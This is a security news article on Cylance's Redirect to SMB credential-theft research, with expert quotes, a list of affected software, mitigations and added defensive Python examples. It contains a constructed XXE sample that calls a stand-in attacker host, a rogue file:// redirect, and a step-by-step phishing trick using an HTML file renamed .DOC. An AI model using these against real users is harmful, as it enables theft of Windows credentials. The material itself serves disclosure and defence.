New methods expand the attack surface to applications and software beyond Windows.
SPEAR, the research team at Cylance, has discovered new attack vectors for an 18-year-old vulnerability in Windows Server Message Block (SMB). The updated attack vector, called Redirect to SMB, impacts products from Microsoft, Apple, Adobe, Symantec, Box, Oracle, and more.
In 1997, Aaron Spangler discovered a bug in Internet Explorer that allowed attackers to steal credentials by abusing Windows' willingness to authenticate automatically, over SMB, to any server a link pointed at.
SMB is a core component in Windows networking, and enabled by default in all versions of the Windows OS.
Microsoft provided workarounds and hard-to-deploy Group Policy options after the flaw was initially disclosed, but never fully addressed the underlying problem. As things stand now, unless default settings in Windows are changed, systems remain vulnerable to this type of attack.
An SMB attack is one where a victim is tricked into following a link that causes the browser to authenticate to a remote SMB server (e.g. file://x.x.x.x or \\x.x.x.x\), which results in the attacker obtaining credentials for the user that is currently logged in. What the attacker captures is not the password itself but an NTLM challenge-response (NetNTLMv2 on modern systems); it can be brute-forced offline, and with GPU-based cracking a weak or short password typically falls within hours.
The Redirect to SMB attack discovered by SPEAR follows the original concepts developed by Spangler, but now the attack can target all vulnerable HTTP/HTTPS requests, including those made by browsers as well as applications attempting to access resources on the Web.
For this updated method to work, attackers would use a Web server under their control, or gain access to network traffic (Man-in-the-Middle) and force the user to authenticate to a rogue server running SMB. For example, online, the attackers could answer a request with a 301 or 302 status code whose Location header points the browser at a resource that starts with file://. In the Man-in-the-Middle case, any unencrypted HTTP response can be rewritten into such a redirect; HTTPS responses cannot, unless the attacker also defeats certificate validation.
“Abusing network share paths (UNC) to steal and relay Windows credentials has been well-known for almost 20 years,” said HD Moore, Chief Research Officer at Rapid7, in a statement to Salted Hash.
“These techniques are often used by professional attackers (legit or otherwise) to gain initial access to an organization and to escalate privileges once they are on the internal network. Microsoft has provided a number of mitigations that have made these attacks slightly less effective, but overall, it is a design issue that is not likely to be fixed for quite some time.”
So what's vulnerable?
Internet Explorer has been vulnerable to the direct attack for nearly two decades, and it is also vulnerable to the Redirect to SMB attack. The WebBrowser object in .NET is also vulnerable.
“If the target is not using Internet Explorer, things get a bit trickier. My favorite way around this is to take a document from the organization’s web site, save it as HTML, add an image link to my SMB server, rename the .HTML as .DOC, and email it as a ‘typo correction’ or ‘sales inquiry’ to various staff. When the users open the .DOC file, Word realizes it’s HTML, and then renders it with Internet Explorer, triggering the outbound connection to the SMB server. If the organization allows VPN access, the stolen/cracked credentials can then be used to access the corporate network,” Moore explained.
URLMon.dll, which Microsoft and third-party developers use for URL operations such as downloading files, has four functions that are vulnerable to both the direct attack from 1997 and the newer Redirect to SMB attack. A fifth function is also vulnerable to the direct attack, but under normal circumstances it is not vulnerable to the Redirect to SMB attack.
“If the application making this request calls one of the affected URLMon APIs, the machine will then make an outbound SMB connection. This significantly increases the effectiveness of man-in-the-middle attacks, even if the user isn’t actively doing anything on the system,” Moore added.
“I did a quick test by enabling HTTP tracing on my laptop, rebooting, and logging in. Over 100 different HTTP requests were made during that process, over half of which were not protected by SSL, and could be used to force an outbound SMB connection by a malicious attacker able to man-in-the-middle my traffic. Just resuming my laptop in a Starbucks would be enough to trigger this issue, which is a significant increase in exposure compared to an attacker having to wait for either Internet Explorer to be used or an outbound SMB connection to be made automatically.”
SPEAR also discovered that XXE (XML External Entities), a feature supported by many XML parsers, could be abused to make the parser fetch a remote resource, which exposes any application that parses attacker-supplied XML with external entities enabled to Redirect to SMB: the entity's URL can point at an HTTP server that answers with a redirect to file://, or directly at a UNC path.
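The following is an added example and not code from the Cylance paper: it shows a constructed XXE document of the kind described above and a pre-parse audit, built on Python's stdlib expat binding, that lists the external entity URLs the document would cause a resolving parser to fetch, without fetching anything. The host name attacker.example and the document itself are made up for illustration; pyexpat never performs network fetches on its own, but parsers that resolve external entities (lxml with resolve_entities left on, or older xml.sax configurations) would.

```python
"""Audit an XML document for XXE-driven outbound fetches before parsing it.

Added example (not Cylance's or Rapid7's code). The document and the host
name attacker.example are constructed for illustration.
"""
from urllib.parse import urlsplit
from xml.parsers import expat

# Constructed sample: an attacker-supplied document whose external entity
# points at an HTTP URL. The server behind that URL can answer
# "302 Location: file://..." and turn the parser's fetch into an SMB login.
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://attacker.example/probe">
]>
<data>&xxe;</data>
"""

# Constructed benign document with no DOCTYPE at all.
PLAIN_DOC = b"<data>hello</data>"


def external_entity_refs(doc: bytes) -> list:
    """Return the system IDs (URLs) of external entities the document dereferences.

    expat invokes ExternalEntityRefHandler when content references an external
    general entity. The handler records the URL and returns 1 so expat treats
    the entity as empty and carries on; nothing is fetched.
    """
    seen = []

    def on_external_ref(context, base, system_id, public_id):
        seen.append(system_id)
        return 1

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(doc, True)
    return seen


def risky_refs(doc: bytes) -> list:
    """Subset of refs that can end in an SMB connection.

    UNC paths and file:// go to SMB directly; http(s) can be redirected there
    by the remote server (the Redirect to SMB case); a scheme-less value is a
    local path relative to the document and is treated as file access too.
    """
    risky = []
    for ref in external_entity_refs(doc):
        scheme = urlsplit(ref).scheme.lower()
        if ref.startswith("\\\\") or scheme in ("", "file", "http", "https"):
            risky.append(ref)
    return risky


def parse_if_safe(doc: bytes) -> bool:
    """Refuse the document if it would trigger any external fetch.

    Returns True when the document is safe to hand to a resolving parser;
    raises ValueError naming the offending URLs otherwise.
    """
    refs = risky_refs(doc)
    if refs:
        raise ValueError("document dereferences external entities: %r" % refs)
    return True


if __name__ == "__main__":
    print("external refs:", external_entity_refs(XXE_DOC))
    try:
        parse_if_safe(XXE_DOC)
    except ValueError as err:
        print("refused:", err)
    print("plain document safe:", parse_if_safe(PLAIN_DOC))
```

The audit is a gate in front of whatever parser the application really uses; the durable fix is still to disable external entity resolution in that parser, since an auditor that runs in a different parser than the consumer can be bypassed by parser-specific quirks.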
The SPEAR report also includes a list of possible attack vectors that could be leveraged in a Redirect to SMB setting, including direct Man-in-the-Middle, ARP cache poisoning, browser injection, the image preview option in many chat applications, malicious documents, and DNS cache poisoning.
“In cases where you can’t control the user’s behavior (visiting a link or opening an email), you need to be able to control the actual network,” Moore said.
“The problem with this approach is it depends on the user’s machine doing something in order to trigger an SMB authentication. This could be accessing a file share, a printer, or another automated task that triggers an SMB connection. This can be time consuming, since you basically have to wait the user out, or get lucky with a share connection, in order to accomplish this attack through a man-in-the-middle. Unless the user opens Internet Explorer or makes an SMB connection directly, there is no guarantee this attack will be of much use.”
What software / applications are affected?
Widely Used Applications:
Apple Software Update (iTunes)
Windows Media Player
Microsoft Baseline Security Analyzer
Symantec’s Norton Security Scan
Github for Windows
JDK 8u31’s installer
“Any known vulnerable functions used by the software need to be replaced with functions that do not support cross protocol redirection…Access to SMB should be direct and filtered by the application. Disallowing any SMB requests outside of the local subnet, or at least requiring user verification, can limit the remote exploitation situations,” wrote Brian Wallace, the researcher who was in charge of this particular SPEAR project, in a paper on the topic.
“TCP port 139 and 445 should be blocked at the outbound firewall. If it is absolutely required that users access external SMB servers, access needs to be restricted as much as possible.”
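As an added example of the client-side mitigation Wallace describes (and of the redirect mechanism described earlier in the piece), the block below is not code from the Cylance paper or from any affected vendor. It parses a constructed 302 response of the kind a rogue server or a man-in-the-middle would return, refuses to follow any redirect that leaves http(s) (file://, UNC, or another scheme), and separately applies the "SMB only inside the local subnet" rule using the ipaddress module. The addresses 203.0.113.9 and 192.168.1.0/24 and the host updates.example are made up.

```python
"""Refuse cross-protocol redirects and off-subnet SMB targets in an HTTP client.

Added example, not code from the Cylance paper or Rapid7. Hosts and addresses
are made up; the raw HTTP response below is constructed, not captured.
"""
import ipaddress
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed: what a rogue server (or a man-in-the-middle rewriting a plain
# HTTP reply) sends back for an ordinary update-check request.
ROGUE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: file://203.0.113.9/share/probe.txt\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_response(raw: bytes):
    """Return (status_code, {lower-case header: value}) from a raw response head."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify_location(location: str) -> str:
    """Classify a Location header value.

    'ok'             absolute http(s) URL or a relative reference (stays on http(s))
    'unc'            \\server\share style path, which Windows opens over SMB
    'cross-protocol' any other scheme (file://, ftp://, ...), the Redirect to SMB case
    """
    loc = location.strip()
    if loc.startswith("\\\\"):
        return "unc"
    scheme = urlsplit(loc).scheme.lower()
    if scheme in ("", "http", "https"):
        return "ok"
    return "cross-protocol"


def next_hop(status: int, headers: dict, base_url: str):
    """Decide whether a client may follow a redirect: (follow, target, reason).

    This is the policy Wallace asks for: a fetch that started on http(s) may
    only continue on http(s), so a redirect can never turn into an SMB login.
    """
    if status not in REDIRECT_CODES:
        return False, None, "not a redirect"
    loc = headers.get("location", "")
    kind = classify_location(loc)
    if kind != "ok":
        return False, loc, "refused %s redirect" % kind
    return True, urljoin(base_url, loc), "followed"


def smb_target_allowed(host: str, local_nets) -> bool:
    """Allow SMB only to an IP address inside the local subnet(s).

    local_nets is a list of CIDR strings. A host name is refused here on
    purpose: the caller must resolve it and re-check the address, since DNS
    cache poisoning is one of the vectors in the SPEAR report.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in ipaddress.ip_network(net) for net in local_nets)


if __name__ == "__main__":
    status, headers = parse_response(ROGUE_RESPONSE)
    print(next_hop(status, headers, "http://updates.example/check"))
    print(next_hop(301, {"location": "/v2/check"}, "http://updates.example/check"))
    print(smb_target_allowed("192.168.1.20", ["192.168.1.0/24"]),
          smb_target_allowed("203.0.113.9", ["192.168.1.0/24"]))
```

Note that CPython's own urllib already refuses redirects to schemes other than http, https and ftp; the point of spelling the policy out is that the affected Windows components (URLMon, the WebBrowser control) do not, and an application-level check like `next_hop` is what Wallace's "functions that do not support cross protocol redirection" amounts to. The subnet rule is a host-side complement to the outbound firewall block on TCP 139 and 445 he recommends, not a replacement for it.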
The research paper also recommends the use of strong passwords, which helps hinder cracking attempts. However, advances in GPU-based password cracking have sharply lowered the time needed to brute-force a captured NetNTLMv2 challenge-response. As such, the paper also recommends that administrators revisit their password policies over time to reflect the falling cost of the hardware used to crack passwords.
“The oclHashcat website includes benchmarks for NetNTLMv2 using 8 x AMD R9 290X GPUs (each retails for about $300 to $700). It shows that with roughly $3000 worth of these GPUs, an attacker could make 6.496 billion guesses per second,” Wallace wrote.
“That means during a simple brute-force attack, an attacker would be able to guess every 8 character password consisting of letters (upper and lower case) and numbers in less than 9.5 hours. Given that password renewal policies are often required once a quarter, this gives the attackers a large amount of time to use those passwords.”
A copy of the full report from Cylance is available here.
“The RedirectToSMB attack is not an earth-shattering vulnerability, but it does demonstrate a novel approach to attacking passive client systems through a man-in-the-middle attack. On the surface, this attack doesn’t look like anything new at first, but it significantly increases the exploitability of Windows laptop and tablet users that connect to open WiFi networks. In terms of mitigations, all of the normal advice for preventing outbound SMB authentication applies,” Moore said.
Last year, Rapid7 worked with Microsoft and Palo Alto Networks to come up with specific guidance for protecting service accounts, and Moore said that many of those recommendations apply to this issue as well. A copy of their recommendations is available here.